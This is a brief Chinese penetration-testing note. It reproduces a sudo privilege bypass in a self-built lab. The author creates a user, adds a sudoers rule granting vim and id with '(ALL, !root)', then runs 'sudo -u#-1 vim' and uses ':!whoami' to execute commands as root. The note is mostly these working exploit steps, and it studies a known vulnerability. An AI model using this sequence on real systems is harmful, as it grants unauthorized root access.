渗透笔记之sudo逻辑漏洞
Sudo 利用vim编辑器进行一个权限绕过
1.创建用户useradd 用户名
passwd 用户名
password 密码
2.用root账号修改/etc/sudoers配置文件在文件里添加
新用户名 ALL = (ALL, !root) /usr/bin/vim
新用户名 ALL = (ALL, !root) /usr/bin/id
强制保存退出
3.切换用户 su用户名 sudo -u#-1 vim
命令执行成功以后就会进入下图这样的界面
4.然后我们直接执行:!命令 例如 :!whoami
5.可以看到刚才执行不了的命令都可以执行了 然后看一下 whoami 自己的身份
哒哒哒~